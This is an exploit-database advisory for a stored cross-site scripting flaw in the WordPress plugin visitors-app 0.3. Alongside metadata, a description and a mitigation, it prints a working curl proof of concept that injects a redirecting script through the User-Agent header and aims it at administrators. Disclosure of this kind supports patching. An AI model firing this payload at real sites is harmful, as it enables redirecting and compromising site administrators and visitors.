WordPress Plugin visitors-app 0.3 - 'user-agent' Stored Cross-Site Scripting (XSS)

vendor:

visitors-app

by:

Mesut Cetin

8.8

CVSS

HIGH

Stored Cross-Site Scripting (XSS)

CWE

Product Name: visitors-app

Affected Version From: 0.3

Affected Version To: 0.3

Patch Exists: YES

Related CWE: N/A

CPE: 2.3:a:wordpress:visitors-app:0.3

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Debian GNU/Linux 10

2021

WordPress Plugin visitors-app 0.3 – ‘user-agent’ Stored Cross-Site Scripting (XSS)

A vulnerability in the Wordpress plugin 'visitors' version 0.3 and prior allows remote attacker through Cross-Site Scripting (XSS) to redirect administrators and visitors and potentially obtain sensitive informations. The 'user-agent' parameter allows attacker to escalate their privileges.

Mitigation:

Ensure that user-supplied input is properly sanitized and validated before being used in the application.

Source

Exploit-DB raw data:

# Exploit Title: WordPress Plugin visitors-app 0.3 - 'user-agent' Stored Cross-Site Scripting (XSS)
# Date: 09/06/2021
# Exploit Author: Mesut Cetin
# Vendor Homepage: https://profiles.wordpress.org/domingoruiz/
# Software Link: https://wordpress.org/plugins/visitors-app/
# Version: 0.3 
# Tested on: Debian GNU/Linux 10
# Reference: https://wpscan.com/vulnerability/06f1889d-8e2f-481a-b91b-3a8008e00ffc

## Description:
# A vulnerability in the Wordpress plugin "visitors" version 0.3 and prior allows remote attacker through 
# Cross-Site Scripting (XSS) to redirect administrators and visitors and potentially obtain sensitive informations
# The 'user-agent' parameter allows attacker to escalate their privileges.

## PoC
# Replace google.com with malicious attacker page
curl -i http://localhost/wordpress --user-agent "</script><script>location=([]+/http:\\google.com/g).substr(1,19); </script>"

# on http://localhost/wordpress/wp-admin, browse the tab "visitors"